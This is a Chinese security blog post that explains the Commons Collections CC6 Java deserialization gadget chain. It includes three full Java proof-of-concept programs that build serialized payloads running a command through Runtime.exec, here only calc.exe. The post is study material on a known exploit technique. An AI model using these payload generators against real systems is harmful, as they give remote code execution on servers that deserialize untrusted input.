Javaweb安全——反序列化漏洞-CC6链

已于 2022-10-28 12:39:39 修改
阅读量766 收藏
点赞数 1
分类专栏: JavaWeb安全 文章标签: java web安全 安全 ctf
于 2022-06-01 10:49:36 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43610673/article/details/125079601
版权

CommonCollections6

本文环境为 JDK8u211

现在开始学习,Java 8u71之后,即高版本Java利用链,从CommonCollections6开始

在 8u71之后AnnotationInvocationHandler的逻辑变成新建了一个LinkedHashMap对象,并将原来的键值添加进去,传进去的恶意Map不再执行set或put操作。而LazyMap是通过invoke方法触发其get方法开始的,所以需要一个新的触发get方法的点,先看ysoserial当中CC6的

Gadget chain:

	    java.io.ObjectInputStream.readObject()
            java.util.HashSet.readObject()
                java.util.HashMap.put()
                java.util.HashMap.hash()
                    org.apache.commons.collections.keyvalue.TiedMapEntry.hashCode()
                    org.apache.commons.collections.keyvalue.TiedMapEntry.getValue()
                        org.apache.commons.collections.map.LazyMap.get()
                            org.apache.commons.collections.functors.ChainedTransformer.transform()
                            org.apache.commons.collections.functors.InvokerTransformer.transform()
                            java.lang.reflect.Method.invoke()
                                java.lang.Runtime.exec()

通过org.apache.commons.collections.keyvalue.TiedMapEntry.getValue()去触发get方法

直接搜get,找到getValue()方法

public Object getValue() {
        return map.get(key);
    }

查找其调用,跟踪到hashCode()方法

public int hashCode() {
    Object value = getValue();
    return (getKey() == null ? 0 : getKey().hashCode()) ^
           (value == null ? 0 : value.hashCode()); 
}

要调用这个TiedMapEntry.hashCode(),按ysoserial的逻辑就到了HashMap.hash()

static final int hash(Object key) {
    int h;
    return (key == null) ? 0 : (h = key.hashCode()) ^ (h >>> 16);
}

再到HashMap.put()去调用hash()

public V put(K key, V value) {
        return putVal(hash(key), key, value, false, true);
    }

不过这里putVal(hash(key)......)的调用其实在HashMap.readObject()当中也有相似的调用,下面就分为两个分支进行学习,其实本身还是同一个东西。

HashSet.readObject()

先来学习ysoserial用的链子

    /**
     * Reconstitute the <tt>HashSet</tt> instance from a stream (that is,
     * deserialize it).
     */
private void readObject(java.io.ObjectInputStream s)
        throws java.io.IOException, ClassNotFoundException {
        // Read in any hidden serialization magic
        s.defaultReadObject();
// Read in all elements in the proper order.
        for (int i=0; i<size; i++) {
            @SuppressWarnings("unchecked")
                E e = (E) s.readObject();
            //调用HashMap.put
            map.put(e, PRESENT);
        }
    }

那么直接new一个HashSet 再调用其put方法即可

package ser;

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;

import java.io.*;
import java.util.HashMap;
import java.util.HashSet;
import java.util.Map;

public class CommonsCollections6 {
    public static void main(String[] args) throws NoSuchFieldException, IllegalAccessException, IOException, ClassNotFoundException {
        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[]{
                        String.class, Class[].class}, new Object[]{
                        "getRuntime", new Class[0]}),
                new InvokerTransformer("invoke", new Class[]{
                        Object.class, Object[].class}, new Object[]{
                        null, new Object[0]}),
                new InvokerTransformer("exec",
                        new Class[]{String.class}, new Object[]{"calc.exe",}),
                new ConstantTransformer(1)};
        //防止payload生成过程中触发,先放进去一个空的Transform
        Transformer transformerChain = new ChainedTransformer(transformers);
        
        Map innerMap = new HashMap();
        Map lazyMap = LazyMap.decorate(innerMap, transformerChain);

        TiedMapEntry entry = new TiedMapEntry(lazyMap, "foo");

        HashSet expMap = new HashSet();
        expMap.add(entry);

// ==================
// 生成序列化字符串
        ByteArrayOutputStream barr = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(barr);
        oos.writeObject(expMap);
        oos.close();

        // 本地测试触发
        System.out.println(barr);
        ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray()));
        Object o = (Object)ois.readObject();
    }
}

运行代码会发现弹出两个计算器,可以看到在调用HashSet.put方法时候也会调用一次hashMap.put

image-20220531010745281

解决办法就是构造LazyMap的时候先用无害的fakeTransformers 对象,序列化的时候再通过反射将把恶意transformers 替换进去。

POC:
package ser;

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;

import java.io.*;
import java.lang.reflect.Field;
import java.util.HashMap;
import java.util.HashSet;
import java.util.Map;

public class CommonsCollections6 {
    public static void main(String[] args) throws NoSuchFieldException, IllegalAccessException, IOException, ClassNotFoundException {
        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[]{
                        String.class, Class[].class}, new Object[]{
                        "getRuntime", new Class[0]}),
                new InvokerTransformer("invoke", new Class[]{
                        Object.class, Object[].class}, new Object[]{
                        null, new Object[0]}),
                new InvokerTransformer("exec",
                        new Class[]{String.class}, new Object[]{"calc.exe",}),
                new ConstantTransformer(1)};
        //防止payload生成过程中触发,先放进去一个空的Transform
        Transformer[] fakeTransformers = new Transformer[] {new ConstantTransformer(1)};
        Transformer transformerChain = new ChainedTransformer(fakeTransformers);

        Map innerMap = new HashMap();
        Map lazyMap = LazyMap.decorate(innerMap, transformerChain);

        TiedMapEntry entry = new TiedMapEntry(lazyMap, "foo");

        HashSet expMap = new HashSet();
        expMap.add(entry);
        //移除entry那lazyMap的键
        lazyMap.remove("foo");
        //通过反射将真正的恶意Transform放进去
        Field f = ChainedTransformer.class.getDeclaredField("iTransformers");
        f.setAccessible(true);
        f.set(transformerChain, transformers);
// ==================
// 生成序列化字符串
        ByteArrayOutputStream barr = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(barr);
        oos.writeObject(expMap);
        oos.close();

        // 本地测试触发
        System.out.println(barr);
        ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray()));
        Object o = (Object)ois.readObject();
    }
}

不过这个POC和ysoserial的CommonsCollections6还是有不小差别的,ysoserial做了很多优化,不过这里只是为了学习基本原理,就先不深入了

HashMap.readObject

这是p神简化之后的CC6利用链

private void readObject(java.io.ObjectInputStream s)
        throws IOException, ClassNotFoundException {
        // Read in the threshold (ignored), loadfactor, and any hidden stuff
        s.defaultReadObject();
        reinitialize();
..........................................
            // Read the keys and values, and put the mappings in the HashMap
            for (int i = 0; i < mappings; i++) {
                @SuppressWarnings("unchecked")
                    K key = (K) s.readObject();
                @SuppressWarnings("unchecked")
                    V value = (V) s.readObject();
                putVal(hash(key), key, value, false, false);
            }
        }
    }

直接再生成一个hashMap,然后put进去即可

Map expMap = new HashMap();
expMap.put(entry, "valuevalue");

不过直接去生成payload的话,反序列化的时候会发现没有弹出计算器。在readObject下断点调试一下即可发现if (map.containsKey(key) == false)这因为map已经有foo这个key了,所以表达式为true也就无法进入transform了

image-20220601000352336

需要在序列化之前移除这个key lazyMap.remove("foo");

POC:
package ser;

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;

import java.io.*;
import java.lang.reflect.Field;
import java.util.HashMap;
import java.util.Map;

public class CC6 {
    public static void main(String[] args) throws NoSuchFieldException, IllegalAccessException, IOException, ClassNotFoundException {
        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[]{
                        String.class, Class[].class}, new Object[]{
                        "getRuntime", new Class[0]}),
                new InvokerTransformer("invoke", new Class[]{
                        Object.class, Object[].class}, new Object[]{
                        null, new Object[0]}),
                new InvokerTransformer("exec",
                        new Class[]{String.class}, new Object[]{"calc.exe",}),
                new ConstantTransformer(1)};
        //防止payload生成过程中触发,先放进去一个空的Transform
        Transformer[] fakeTransformers = new Transformer[] {new ConstantTransformer(1)};
        Transformer transformerChain = new ChainedTransformer(fakeTransformers);

        Map innerMap = new HashMap();
        Map lazyMap = LazyMap.decorate(innerMap, transformerChain);

        TiedMapEntry entry = new TiedMapEntry(lazyMap, "foo");

        Map expMap = new HashMap();
        expMap.put(entry, "valuevalue");
        //移除entry那lazyMap的键
        lazyMap.remove("foo");
        //通过反射将真正的恶意Transform放进去
        Field f = ChainedTransformer.class.getDeclaredField("iTransformers");
        f.setAccessible(true);
        f.set(transformerChain, transformers);
// ==================
// 生成序列化字符串
        ByteArrayOutputStream barr = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(barr);
        oos.writeObject(expMap);
        oos.close();

        // 本地测试触发
        System.out.println(barr);
        ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray()));
        Object o = (Object)ois.readObject();
    }

}
Arnoldqqq
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
javaWeb安全验证漏洞修复总结.doc
11-29
javaWeb安全验证漏洞修复总结.doc
Commons-Collections6 序列 从0开始手写exp
weixin_51458899的博客
04-11 2111
CC6 cc6的出现弥补了前面的cc1的setValue的缺陷,使得它可以在高于jdk8u65的情况下使用,jdk11不行 ysoserial/CommonsCollections6.java at master · frohoff/ysoserial (github.com) 如何手写exp 可以看到 后半段仍然与yso的cc1一致(一直到LazyMap.get) 调用了TiedMapEntry,进去 hashcode里面调用了getvalue 这里是map.get key对应的value如果改成恶
『Java安全序列-CC6序列漏洞POP链分析_ysoserial CommonsCollections6 PoC分析
Ho1aAs‘s Blog
03-13 558
文章目录前言代码复现工具类PoC代码审计 | 原理分析TiedMapEntry.hashCode()调用toString()方法POP链完 前言 CC6触发TiedMapEntry.hashcode(),非常简单因此只做记录 代码复现 工具类 序列: UnserializePacked.Unserialize.java package UnserializePacked; import java.io.*; public class Unserialize { public static v
java安全 序列(二)
sechelper的博客
12-07 577
java射,CC6链源码分析,LazyMap利用连,ysoserial工具
java最好用的一条链-CC6
qq_62540010的博客
03-25 265
hashcode的作用是为了用来在散列存储结构中确定对象的存储地址的,是为了查找更加方便,以及和equals方法的区别,两个对象的hashcode相等并不一定相等,但equals相等就一定相等。hashcode就是一个对象在hash表中的位置,他并不等同一个对象的物理地址,是对象的物理地址经过hash算法后才产生的hashcode,具体可以搜索这类文章。
CC6链子
..
10-27 727
因为JDK8u71后,Java 官方修改了 sun.reflect.annotation.AnnotationInvocationHandler 的readObject函数++ Class
java序列 cc链6 分析
m0_64815693的博客
04-22 1019
java序列 cc链6 分析
Java序列漏洞——CommonsCollections6链分析
Thunderclap的博客
02-17 556
实际上在java.util.HashMap#readObject 中就可以找到HashMap#hash() 的调⽤,去掉了最前⾯的两次调⽤,在HashMap的readObject⽅法中,调⽤到了hash(key) ,⽽hash⽅法中,调⽤到了key.hashCode()。ysoserial中,是利⽤java.util.HashSet#readObject 到HashMap#put() 到HashMap#hash(key),最后到TiedMapEntry#hashCode()。getValue方法。
Java序列漏洞-CC6利用链分析
最新发布
柠檬i的博客
12-26 1190
经过之前对[CC1链]的分析,现在已经对序列利用链有了初步的认识,这次来分析一个最好用的CC利用链——CC6。 为什么CC6是最好用的CC利用链,因为CC6不限制jdk版本,只要commons collections 小于等于3.2.1,都存在这个漏洞
6-java安全——java序列漏洞利用链
网络安全
07-01 3859
本篇将学习java序列漏洞原理,然后结合一个apache commons-collections组件序列漏洞来学习如何构造利用链。 我们知道序列操作主要是由ObjectOutputStream类的 writeObject()方法来完成,序列操作主要是由ObjectInputStream类的readObject()方法来完成。当可序列对象重写了readObject方法后,在序列时一般会调用序列对象的readObject方法。 在Student类中重写ObjectInputSt
JavaWeb新版教程-html&CSS-L和CSS-表单格式.avi
05-18
JavaWeb新版教程-html&CSS-L和CSS-表单格式.avi
JavaWeb新版教程-html&CSS-L和CSS-表格的跨行跨列.avi
05-18
JavaWeb新版教程-html&CSS-L和CSS-表格的跨行跨列.avi
JavaWeb开发——JSP技术
03-24
此文章包含JSP简介、JSP运行原理、JSP标签与标签库及其使用、JSP的内置对象与作用域对象、EL表达式和MVC模式的简介,...适用于任何学习JavaWeb开发中,需要了解JSP技术的人群,希望这篇文章能对大家的学习有所帮助!
JavaWeb小项目——网上书城-附件资源
03-02
JavaWeb小项目——网上书城-附件资源
[Java序列]CommonsCollections6利用链学习
feng的博客
08-16 910
前言 继续跟着P神的《Java安全漫谈》来学习。前面学习了CC1,遇到的问题就是CC1用到了AnnotationInvocationHandler类,但是AnnotationInvocationHandler类的readObject()方法在8u71以后逻辑就发生了改变,不能再利用了,所以需要找一个可以解决高版本Java的利用链。 因此也就开始了CC6的学习。CC6解决了高版本Java的限制,而且利用更加通用。总的来说,是在CC5(因为我偶然也学了CC5)的基础上,把前面的链部分又进行了通用性上的拓展。 构
ysoserial CommonsColletions6分析
洋洋的小黑屋
07-10 129
CC6的话是一条比较通用的链,在JAVA7和8版本都可以使用,而触发点也是通过LazyMap的get方法。 TiedMapEntry#hashCode 在CC5中,通过的是TiedMapEntry的toString调用到的LazyMap的get方法,而CC6则是通过TiedMapEntry的hashCode方法 此处hashCode会调用getValue方法,getValue就调用到了LazyMap的get方法 接下来我们要找的就是哪里调用了TiedMapEntry#hashCode HashMap#p
CC6链分析与复现
weixin_42974824的博客
08-18 631
CC6链分析与复现
Javaweb安全——序列漏洞-URLDNS链
weixin_43610673的博客
05-21 478
序列- URLDNS链 之前学过一遍Java序列漏洞,不过那次是从cc链入手的,当时也看了好久,各种调试才搞明白。这次从调用简单的URLDNS链开始从新捋一遍。 本文SDK为1.8 8u211 URLDNS ysoserial中一个利用链,其触发的结果是一次DNS请求。可用于确认是否存在序列漏洞,因为整条链均用Java内置的类构造,对第三方库没有依赖。 先来看看ysoserial当中的实现代码 public class URLDNS implements ObjectPayload<Obj
Web安全--序列漏洞(java篇)
bobo_milk的博客
11-29 3029
java序列参考
javaweb中web.xml中web-app爆红
04-23
这通常是因为web.xml文件中存在语法错误或格式不正确的标签。请检查你的web.xml文件,并确保其中的每个标签都是正确的,并且有正确的开始和结束标记。另外,也可以尝试清除项目并重新构建,以确保没有任何编译错误...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值